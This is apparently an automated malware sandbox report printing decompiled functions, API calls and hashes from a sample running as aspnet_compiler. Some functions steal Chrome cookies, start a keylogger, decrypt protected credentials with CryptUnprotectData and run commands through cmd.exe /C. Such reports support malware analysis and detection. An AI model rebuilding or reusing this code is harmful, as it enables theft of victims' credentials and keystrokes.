                • Opcode ID: 4be5f40bc9e41d6f9aa7a56090a1d1fea2c663ada0fa1de368a3a68577051258
                • Instruction ID: 353071605875722e2d2290b0d1df67e202755458c4192b98c6391b796ea34086
                • Opcode Fuzzy Hash: 4be5f40bc9e41d6f9aa7a56090a1d1fea2c663ada0fa1de368a3a68577051258
                • Instruction Fuzzy Hash: 96114D32F8061036D918317A4E1BBAE28068786F50F55815FFB013A2C6E5CF5AB143CF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E0040BB66(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                				char _v28;
                				char _v52;
                				char _v76;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				int _t22;
                				int _t32;
                				void* _t59;
                				void* _t63;
                				void* _t64;
                				void* _t66;
                				void* _t67;
                
                				_t59 = __edx;
                				_t40 = __ebx;
                				_t63 = __ecx;
                				E0040BEC3(__ecx);
                				E0040BA3D(__ebx,  &_v52, _t59, __ecx, __eflags);
                				E004087F0( &_v28,  &_v52, _t67, L"User Data\\Default\\Network\\Cookies");
                				_t22 = PathFileExistsW(E00401EE4( &_v28));
                				_t69 = _t22;
                				if(_t22 != 0) {
                					E0040BE24(__ebx, _t63, _t67, _t69,  &_v28);
                				}
                				E00401EF3( &_v28,  &_v52, _t64, E004087F0( &_v76,  &_v52, _t67, L"User Data\\Profile ?\\Network\\Cookies"));
                				E00401EE9();
                				_t66 = 1;
                				do {
                					_push(E0041A762(_t40,  &_v76, _t66));
                					E0040BECD(E0040245C() - 0x11,  &_v76);
                					E00401EE9();
                					_t32 = PathFileExistsW(E00401EE4( &_v28));
                					_t71 = _t32;
                					if(_t32 != 0) {
                						E0040BE24(_t40, _t63, _t67, _t71,  &_v28);
                					}
                					_t66 = _t66 + 1;
                				} while (_t66 < 0x64);
                				E00401EE9();
                				E00401EE9();
                				return _t63;
                			}

















                APIs
                  • Part of subcall function 0040BA3D: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0040BB7D), ref: 0040BA70
                • PathFileExistsW.SHLWAPI(00000000), ref: 0040BB97
                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040BC02
                Strings
                • User Data\Default\Network\Cookies, xrefs: 0040BB7D
                • User Data\Profile ?\Network\Cookies, xrefs: 0040BBAC
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                • API String ID: 1174141254-1980882731
                • Opcode ID: 7dd47be56250a5faee074aa80a38bd63018c82ec96d504af74951610f8248316
                • Instruction ID: d3bd7a9e1c96093492625e3e5ee86b1017f979b14bb93b73e7de0ea03ad3c358
                • Opcode Fuzzy Hash: 7dd47be56250a5faee074aa80a38bd63018c82ec96d504af74951610f8248316
                • Instruction Fuzzy Hash: F521E2719101195ACB04F7A6DC96CEEB7B8EE50718B44003FF901B21E2EF789946C6DC
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E0040A461(void* __ecx, void* __edx) {
                				char _v28;
                				void* __ebx;
                				void* __edi;
                				void* __ebp;
                				void* _t7;
                				void* _t18;
                				void* _t31;
                				void* _t32;
                				void* _t33;
                
                				_t31 = __ecx;
                				_t38 =  *((char*)(__ecx + 0x4a));
                				if( *((char*)(__ecx + 0x4a)) == 0) {
                					 *((char*)(__ecx + 0x4a)) = 1;
                					E00402073(_t18,  &_v28, __edx, _t32, "Online Keylogger Started");
                					_t34 = _t33 - 0x18;
                					E0041A7B9(_t33 - 0x18,  &_v28);
                					E0040A6DA(_t18, _t31, _t38);
                					E00401FB8();
                					E00402073(_t18, _t34 - 0x18,  &_v28, _t32, "Online Keylogger Started");
                					E00402073(_t18, _t34,  &_v28, _t32, "i");
                					E0041A04A(_t18, "Online Keylogger Started");
                					if( *((intOrPtr*)(_t31 + 0x49)) == 0) {
                						if( *_t31 == 0) {
                							CreateThread(0, 0, E0040986A, _t31, 0, 0);
                						}
                						CreateThread(0, 0, E0040988C, _t31, 0, 0);
                					}
                					return CreateThread(0, 0, E00409898, _t31, 0, 0);
                				}
                				return _t7;
                			}













                APIs
                  • Part of subcall function 0040A6DA: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                  • Part of subcall function 0040A6DA: wsprintfW.USER32 ref: 0040A769
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                • CreateThread.KERNEL32 ref: 0040A4E1
                • CreateThread.KERNEL32 ref: 0040A4ED
                • CreateThread.KERNEL32 ref: 0040A4F9
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread$LocalTime$wsprintf
                • String ID: Online Keylogger Started
                • API String ID: 112202259-1258561607
                • Opcode ID: b5ce605152c48d04b1b9bb0a80f2cf9395598435e1e11e2bbee5f5a778ef834b
                • Instruction ID: 2918f94b29e643706cc8194107c31a37d0557916cfe4d3346365f420470abdd0
                • Opcode Fuzzy Hash: b5ce605152c48d04b1b9bb0a80f2cf9395598435e1e11e2bbee5f5a778ef834b
                • Instruction Fuzzy Hash: 4501A1A5A003083EE62076769C8ADBF7A6CCA92398F40057FF545222C3D9BD1D5582FA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 28%
                			E004060D7(intOrPtr __ecx, char __edx, char* _a4) {
                				intOrPtr _v8;
                				char _v12;
                				intOrPtr _v16;
                				char _v20;
                				_Unknown_base(*)()* _t11;
                				intOrPtr _t18;
                				intOrPtr _t24;
                				char* _t26;
                				void* _t29;
                				char* _t32;
                
                				_t11 =  *0x470af4; // 0x0
                				_v16 = __ecx;
                				_v20 = __edx;
                				if(_t11 == 0) {
                					_t11 = GetProcAddress(LoadLibraryA("crypt32"), "CryptUnprotectData");
                					 *0x470af4 = _t11;
                				}
                				_push( &_v12);
                				_push(0);
                				_push(0);
                				_push(0);
                				_push(0);
                				_push(0);
                				_push( &_v20);
                				if( *_t11() == 0) {
                					return 0;
                				} else {
                					_t24 = _v12;
                					_t26 = _a4;
                					if(_t24 == 0) {
                						L7:
                						 *((char*)(_t24 + _t26)) = 0;
                						return _v12;
                					}
                					_t32 = _t26;
                					_t29 = _v8 - _t26;
                					_t18 = _t24;
                					do {
                						 *_t32 =  *((intOrPtr*)(_t29 + _t32));
                						_t32 = _t32 + 1;
                						_t18 = _t18 - 1;
                					} while (_t18 != 0);
                					goto L7;
                				}
                			}














                APIs
                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,0040609F,?), ref: 004060F6
                • GetProcAddress.KERNEL32(00000000), ref: 004060FD
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: CryptUnprotectData$crypt32
                • API String ID: 2574300362-2380590389
                • Opcode ID: 5deaecffb08fff2b823b0b74764ae02e5ae7b43c49087b2fd004d2f9456ea8b6
                • Instruction ID: beb262a90158fb4cf50087408c2c088a9110264107d79c3b72559a6e192aff88
                • Opcode Fuzzy Hash: 5deaecffb08fff2b823b0b74764ae02e5ae7b43c49087b2fd004d2f9456ea8b6
                • Instruction Fuzzy Hash: 75012831A04315ABCF18CFACDC409ABBBB8EF54300F0002BEE956E7341D675D9008798
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E0040513C() {
                				void* __ebx;
                				void* __ecx;
                				long _t19;
                				void* _t24;
                				intOrPtr _t28;
                				void* _t29;
                				void* _t30;
                				void* _t31;
                				void* _t32;
                				void* _t33;
                				intOrPtr _t40;
                
                				_t31 = _t24;
                				 *((intOrPtr*)(_t31 + 0x78)) = 0;
                				if( *((intOrPtr*)(_t31 + 0x74)) <= 0) {
                					L3:
                					 *((char*)(_t31 + 0x5c)) = 0;
                					_t40 =  *0x470d48; // 0x0
                					if(_t40 != 0) {
                						_t34 = _t33 - 0x18;
                						E00402073(0, _t33 - 0x18, _t29, _t32, "Connection Timeout");
                						E00402073(0, _t34 - 0x18, _t29, _t32, "E");
                						E0041A04A(0, _t30);
                					}
                					E00404E06(_t29);
                					return 1;
                				} else {
                					goto L1;
                				}
                				while(1) {
                					L1:
                					_t19 = WaitForSingleObject( *(_t31 + 0x60), 0x3e8);
                					 *((intOrPtr*)(_t31 + 0x78)) =  *((intOrPtr*)(_t31 + 0x78)) + 1;
                					_t28 =  *((intOrPtr*)(_t31 + 0x78));
                					if(_t19 == 0) {
                						break;
                					}
                					if(_t28 <  *((intOrPtr*)(_t31 + 0x74))) {
                						continue;
                					}
                					goto L3;
                				}
                				CloseHandle( *(_t31 + 0x60));
                				 *(_t31 + 0x60) = 0;
                				 *((char*)(_t31 + 0x5c)) = 0;
                				SetEvent( *(_t31 + 0x64));
                				return 0;
                			}















                APIs
                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                • CloseHandle.KERNEL32(?), ref: 004051AA
                • SetEvent.KERNEL32(?), ref: 004051B9
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseEventHandleObjectSingleWait
                • String ID: Connection Timeout
                • API String ID: 2055531096-499159329
                • Opcode ID: 30c97919601a0bafcd1ec3cc362548623f5d588fc2a5b0f78b24e89b2ef7ef86
                • Instruction ID: 87dc7bd1a7f2c12f2d5d2db554b8500d969d653d79ad8885273b8c0985c03cd0
                • Opcode Fuzzy Hash: 30c97919601a0bafcd1ec3cc362548623f5d588fc2a5b0f78b24e89b2ef7ef86
                • Instruction Fuzzy Hash: 1401F531A44B40AFE7226B36DC4551B7FD0FF01301700097FF18356AA2DA78A440CF5A
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040DD37
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 2005118841-1866435925
                • Opcode ID: 6211aa1379568c384751f3f23f8808a2a799c885f71157578241e55c7260a878
                • Instruction ID: c83b488e6c0b567c715bed89e41106fb5d46d583803a0575b5f187d309fe0aa3
                • Opcode Fuzzy Hash: 6211aa1379568c384751f3f23f8808a2a799c885f71157578241e55c7260a878
                • Instruction Fuzzy Hash: 5401D6B1E487087AE714EAD5CC13FBA77685F10705F50403FB906761C2EABC6549CA2E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00415181(void* __edx, void* __ebp, void* __eflags, char _a16, char _a52, void* _a76, char _a80, void* _a152, void* _a176) {
                				void* _t11;
                
                				_t41 = __eflags;
                				_t11 = E0040415E(0,  &_a80, __edx, __ebp, E00401F8B(E00401E45( &_a16, __edx, __ebp, __eflags, 0)));
                				_t35 = L"/C ";
                				ShellExecuteW(0, L"open", L"cmd.exe", E00401EE4(E004042DC(0,  &_a52, L"/C ", __ebp, _t41, _t11)), 0, 0);
                				E00401EE9();
                				E00401EE9();
                				E00401E6D( &_a16, _t35);
                				E00401FB8();
                				E00401FB8();
                				return 0;
                			}





                APIs
                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151C3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExecuteShell
                • String ID: /C $cmd.exe$open
                • API String ID: 587946157-3896048727
                • Opcode ID: a54521aa5aa32059fc7229d534241737211c2f29cc6a196b20319429e6c9867f
                • Instruction ID: b910b50d10bf9c10a53822f7bfccbc49879064c70acfec78918e038c0e9cbf8d
                • Opcode Fuzzy Hash: a54521aa5aa32059fc7229d534241737211c2f29cc6a196b20319429e6c9867f
                • Instruction Fuzzy Hash: ADF012712083045AC314FBB2DC959AFB3E8AB90319F500C3FB546611E2EF389959C65A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E0040D4AA(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                				char _v16;
                				signed int _t34;
                				signed int* _t49;
                				signed int* _t57;
                				void* _t65;
                				signed int* _t66;
                
                				_t65 = __ecx;
                				E00433BCB(__ecx, 0);
                				E0040F09D(__ecx + 4);
                				E0040F09D(__ecx + 0xc);
                				E0040F087(__ecx + 0x14);
                				E0040F087(__ecx + 0x1c);
                				E0040F09D(__ecx + 0x24);
                				E0040F09D(__ecx + 0x2c);
                				_t76 = _a4;
                				if(_a4 == 0) {
                					_t49 =  &_v16;
                					E0040D455(_t49, "bad locale name");
                					E004379F6( &_v16, 0x46cce0);
                					asm("int3");
                					_push(_t65);
                					_t66 = _t49;
                					E00433F5E(_t66);
                					E0040F082( &(_t66[0xb]));
                					E0040F082( &(_t66[9]));
                					E0040F082( &(_t66[7]));
                					E0040F082( &(_t66[5]));
                					E0040F082( &(_t66[3]));
                					E0040F082( &(_t66[1]));
                					_t57 = _t66;
                					_t34 =  *_t57;
                					__eflags = _t34;
                					if(_t34 == 0) {
                						return E004441D1(4);
                					} else {
                						__eflags = _t34 - 8;
                						if(_t34 < 8) {
                							_t37 = 0x470060 + _t34 * 0x18;
                							__eflags = 0x470060 + _t34 * 0x18;
                							return E00434470(0x470060 + _t34 * 0x18, _t37);
                						}
                						return _t34;
                					}
                				} else {
                					E00433F13(__ebx, __edx, __edi, _t76, __ecx, _a4);
                					return _t65;
                				}
                			}










                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 0040D4B5
                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040D4F4
                  • Part of subcall function 00433F13: _Yarn.LIBCPMT ref: 00433F32
                  • Part of subcall function 00433F13: _Yarn.LIBCPMT ref: 00433F56
                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D51A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                • String ID: bad locale name
                • API String ID: 3628047217-1405518554
                • Opcode ID: 3a02377a2724e7e0b0981669c52285330c9c09d789ecaff2d36644942b4f7900
                • Instruction ID: 7d5d85bd939eae65a08207342b5a69e68fd95b80f34b046828c98c3172fb135a
                • Opcode Fuzzy Hash: 3a02377a2724e7e0b0981669c52285330c9c09d789ecaff2d36644942b4f7900
                • Instruction Fuzzy Hash: 72F0A4314446049AC334FF61D853A9FB3689F14758F90453FF686228D7EF38AA0CC699
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00412903(void* __ecx, void* __edx, short* _a4, char _a8) {
                				void* _v8;
                				int _v12;
                				char _v2060;
                				void* __ebp;
                				void* _t19;
                				void* _t23;
                				void* _t24;
                
                				_t22 = __edx;
                				_v12 = 0x400;
                				_t23 = __ecx;
                				if(RegOpenKeyExW(__edx, _a4, 0, 0x20019,  &_v8) != 0) {
                					_push(0x46a8f0);
                				} else {
                					_t6 =  &_a8; // 0x40e830
                					RegQueryValueExW(_v8,  *_t6, 0, 0,  &_v2060,  &_v12);
                					RegCloseKey(_v8);
                					_push( &_v2060);
                				}
                				E0040415E(_t19, _t23, _t22, _t24);
                				return _t23;
                			}











                APIs
                • RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,00473298), ref: 00412925
                • RegQueryValueExW.ADVAPI32(?,0@,00000000,00000000,?,00000400), ref: 00412944
                • RegCloseKey.ADVAPI32(?), ref: 0041294D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: 0@
                • API String ID: 3677997916-11155133
                • Opcode ID: 4ff219f190c783964b3da24bc40874c0d42c6defea26bc115919c49e29e698db
                • Instruction ID: c7fd1c892b01a83c80440586cf5eccaa6983c25e434fa7726a62adcc2e55f33b
                • Opcode Fuzzy Hash: 4ff219f190c783964b3da24bc40874c0d42c6defea26bc115919c49e29e698db
                • Instruction Fuzzy Hash: CCF0C275A0021CFBDB109B90EC45FDE7BBCEB04B11F1040B2BA04F5291DAB4AB949BD8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004013F2() {
                				_Unknown_base(*)()* _t2;
                
                				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
                				 *0x4736e4 = _t2;
                				return _t2;
                			}




                0x00401403
                0x00401409
                0x0040140e

                APIs
                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                • GetProcAddress.KERNEL32(00000000), ref: 00401403
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: GetCursorInfo$User32.dll
                • API String ID: 1646373207-2714051624
                • Opcode ID: d106107450db0d81a8cd297f1c1958bbeafca831e7cd1c5948616fa477c32a51
                • Instruction ID: 339f5e680ac259f41fdaf7538df7a013b816c33a7b3ecda91f69a778ee4b915d
                • Opcode Fuzzy Hash: d106107450db0d81a8cd297f1c1958bbeafca831e7cd1c5948616fa477c32a51
                • Instruction Fuzzy Hash: 89B092B0585700ABC6007FB0BC0D9493A24A604703B1001B2B001A2672EB7991909E3F
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401497() {
                				_Unknown_base(*)()* _t2;
                
                				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                				 *0x47379c = _t2;
                				return _t2;
                			}




                0x004014a8
                0x004014ae
                0x004014b3

                APIs
                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: GetLastInputInfo$User32.dll
                • API String ID: 2574300362-1519888992
                • Opcode ID: 1ce684c1e9215f277348ea1b345f6655546256602e36a9085d5b35a2dabba592
                • Instruction ID: a235115c4c7ff8ecad93221cd3e986331959d115ecffc12b26486691d28a12a6
                • Opcode Fuzzy Hash: 1ce684c1e9215f277348ea1b345f6655546256602e36a9085d5b35a2dabba592
                • Instruction Fuzzy Hash: 9BB092F05657009BCB402FA0BC0E9053B24A604713B208AB2B009A3162EB7D90909F2F
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00448884(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				unsigned int _v20;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				char _v40;
                				intOrPtr _v48;
                				char _v52;
                				void* __ebx;
                				void* __edi;
                				void* _t86;
                				signed int _t92;
                				signed int _t93;
                				signed int _t94;
                				signed int _t100;
                				void* _t101;
                				void* _t102;
                				void* _t104;
                				void* _t107;
                				void* _t109;
                				void* _t111;
                				void* _t115;
                				char* _t116;
                				void* _t119;
                				signed int _t121;
                				signed int _t128;
                				signed int* _t129;
                				signed int _t136;
                				signed int _t137;
                				char _t138;
                				signed int _t139;
                				signed int _t142;
                				signed int _t146;
                				signed int _t151;
                				char _t156;
                				char _t157;
                				void* _t161;
                				unsigned int _t162;
                				signed int _t164;
                				signed int _t166;
                				signed int _t170;
                				void* _t171;
                				signed int* _t172;
                				signed int _t174;
                				signed int _t181;
                				signed int _t182;
                				signed int _t183;
                				signed int _t184;
                				signed int _t185;
                				signed int _t186;
                				signed int _t187;
                
                				_t171 = __edx;
                				_t181 = _a24;
                				if(_t181 < 0) {
                					_t181 = 0;
                				}
                				_t184 = _a8;
                				 *_t184 = 0;
                				E004390B7(0,  &_v52, _t171, _a36);
                				_t5 = _t181 + 0xb; // 0xb
                				if(_a12 > _t5) {
                					_t172 = _a4;
                					_t142 = _t172[1];
                					_v36 =  *_t172;
                					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                						L11:
                						__eflags = _t142 & 0x80000000;
                						if((_t142 & 0x80000000) != 0) {
                							 *_t184 = 0x2d;
                							_t184 = _t184 + 1;
                							__eflags = _t184;
                						}
                						__eflags = _a28;
                						_v16 = 0x3ff;
                						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                						__eflags = _t172[1] & 0x7ff00000;
                						_v32 = _t136;
                						_t86 = 0x30;
                						if((_t172[1] & 0x7ff00000) != 0) {
                							 *_t184 = 0x31;
                							_t185 = _t184 + 1;
                							__eflags = _t185;
                						} else {
                							 *_t184 = _t86;
                							_t185 = _t184 + 1;
                							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                							__eflags = _t164;
                							if(_t164 != 0) {
                								_v16 = 0x3fe;
                							} else {
                								_v16 = _v16 & _t164;
                							}
                						}
                						_t146 = _t185;
                						_t186 = _t185 + 1;
                						_v28 = _t146;
                						__eflags = _t181;
                						if(_t181 != 0) {
                							_t30 = _v48 + 0x88; // 0xff1875ff
                							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                						} else {
                							 *_t146 = 0;
                						}
                						_t92 = _t172[1] & 0x000fffff;
                						__eflags = _t92;
                						_v20 = _t92;
                						if(_t92 > 0) {
                							L23:
                							_t33 =  &_v8;
                							 *_t33 = _v8 & 0x00000000;
                							__eflags =  *_t33;
                							_t147 = 0xf0000;
                							_t93 = 0x30;
                							_v12 = _t93;
                							_v20 = 0xf0000;
                							do {
                								__eflags = _t181;
                								if(_t181 <= 0) {
                									break;
                								}
                								_t119 = E00456060( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                								_t161 = 0x30;
                								_t121 = _t119 + _t161 & 0x0000ffff;
                								__eflags = _t121 - 0x39;
                								if(_t121 > 0x39) {
                									_t121 = _t121 + _t136;
                									__eflags = _t121;
                								}
                								_t162 = _v20;
                								_t172 = _a4;
                								 *_t186 = _t121;
                								_t186 = _t186 + 1;
                								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                								_t147 = _t162 >> 4;
                								_t93 = _v12 - 4;
                								_t181 = _t181 - 1;
                								_v20 = _t162 >> 4;
                								_v12 = _t93;
                								__eflags = _t93;
                							} while (_t93 >= 0);
                							__eflags = _t93;
                							if(_t93 < 0) {
                								goto L39;
                							}
                							_t115 = E00456060( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                							__eflags = _t115 - 8;
                							if(_t115 <= 8) {
                								goto L39;
                							}
                							_t54 = _t186 - 1; // 0xff8bc35f
                							_t116 = _t54;
                							_t138 = 0x30;
                							while(1) {
                								_t156 =  *_t116;
                								__eflags = _t156 - 0x66;
                								if(_t156 == 0x66) {
                									goto L33;
                								}
                								__eflags = _t156 - 0x46;
                								if(_t156 != 0x46) {
                									_t139 = _v32;
                									__eflags = _t116 - _v28;
                									if(_t116 == _v28) {
                										_t57 = _t116 - 1;
                										 *_t57 =  *(_t116 - 1) + 1;
                										__eflags =  *_t57;
                									} else {
                										_t157 =  *_t116;
                										__eflags = _t157 - 0x39;
                										if(_t157 != 0x39) {
                											 *_t116 = _t157 + 1;
                										} else {
                											 *_t116 = _t139 + 0x3a;
                										}
                									}
                									goto L39;
                								}
                								L33:
                								 *_t116 = _t138;
                								_t116 = _t116 - 1;
                							}
                						} else {
                							__eflags =  *_t172;
                							if( *_t172 <= 0) {
                								L39:
                								__eflags = _t181;
                								if(_t181 > 0) {
                									_push(_t181);
                									_t111 = 0x30;
                									_push(_t111);
                									_push(_t186);
                									E00435760(_t181);
                									_t186 = _t186 + _t181;
                									__eflags = _t186;
                								}
                								_t94 = _v28;
                								__eflags =  *_t94;
                								if( *_t94 == 0) {
                									_t186 = _t94;
                								}
                								__eflags = _a28;
                								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                								_t174 = _a4[1];
                								_t100 = E00456060( *_a4, 0x34, _t174);
                								_t137 = 0;
                								_t151 = (_t100 & 0x000007ff) - _v16;
                								__eflags = _t151;
                								asm("sbb ebx, ebx");
                								if(__eflags < 0) {
                									L47:
                									 *(_t186 + 1) = 0x2d;
                									_t187 = _t186 + 2;
                									__eflags = _t187;
                									_t151 =  ~_t151;
                									asm("adc ebx, 0x0");
                									_t137 =  ~_t137;
                									goto L48;
                								} else {
                									if(__eflags > 0) {
                										L46:
                										 *(_t186 + 1) = 0x2b;
                										_t187 = _t186 + 2;
                										L48:
                										_t182 = _t187;
                										_t101 = 0x30;
                										 *_t187 = _t101;
                										__eflags = _t137;
                										if(__eflags < 0) {
                											L56:
                											__eflags = _t187 - _t182;
                											if(_t187 != _t182) {
                												L60:
                												_push(0);
                												_push(0xa);
                												_push(_t137);
                												_push(_t151);
                												_t102 = E00455D60();
                												_v32 = _t174;
                												 *_t187 = _t102 + 0x30;
                												_t187 = _t187 + 1;
                												__eflags = _t187;
                												L61:
                												_t104 = 0x30;
                												_t183 = 0;
                												__eflags = 0;
                												 *_t187 = _t151 + _t104;
                												 *(_t187 + 1) = 0;
                												goto L62;
                											}
                											__eflags = _t137;
                											if(__eflags < 0) {
                												goto L61;
                											}
                											if(__eflags > 0) {
                												goto L60;
                											}
                											__eflags = _t151 - 0xa;
                											if(_t151 < 0xa) {
                												goto L61;
                											}
                											goto L60;
                										}
                										if(__eflags > 0) {
                											L51:
                											_push(0);
                											_push(0x3e8);
                											_push(_t137);
                											_push(_t151);
                											_t107 = E00455D60();
                											_v32 = _t174;
                											 *_t187 = _t107 + 0x30;
                											_t187 = _t187 + 1;
                											__eflags = _t187 - _t182;
                											if(_t187 != _t182) {
                												L55:
                												_push(0);
                												_push(0x64);
                												_push(_t137);
                												_push(_t151);
                												_t109 = E00455D60();
                												_v32 = _t174;
                												 *_t187 = _t109 + 0x30;
                												_t187 = _t187 + 1;
                												__eflags = _t187;
                												goto L56;
                											}
                											L52:
                											__eflags = _t137;
                											if(__eflags < 0) {
                												goto L56;
                											}
                											if(__eflags > 0) {
                												goto L55;
                											}
                											__eflags = _t151 - 0x64;
                											if(_t151 < 0x64) {
                												goto L56;
                											}
                											goto L55;
                										}
                										__eflags = _t151 - 0x3e8;
                										if(_t151 < 0x3e8) {
                											goto L52;
                										}
                										goto L51;
                									}
                									__eflags = _t151;
                									if(_t151 < 0) {
                										goto L47;
                									}
                									goto L46;
                								}
                							}
                							goto L23;
                						}
                					}
                					__eflags = 0;
                					if(0 != 0) {
                						goto L11;
                					} else {
                						_t183 = E00448B87(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                						__eflags = _t183;
                						if(_t183 == 0) {
                							_t128 = E00456140(_t184, 0x65);
                							_pop(_t166);
                							__eflags = _t128;
                							if(_t128 != 0) {
                								__eflags = _a28;
                								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                								__eflags = _t170;
                								 *_t128 = _t170;
                								 *((char*)(_t128 + 3)) = 0;
                							}
                							_t183 = 0;
                						} else {
                							 *_t184 = 0;
                						}
                						goto L62;
                					}
                				} else {
                					_t129 = E0043EEAD();
                					_t183 = 0x22;
                					 *_t129 = _t183;
                					E0043A5BB();
                					L62:
                					if(_v40 != 0) {
                						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                					}
                					return _t183;
                				}
                			}

























































                APIs
                Memory Dump Source
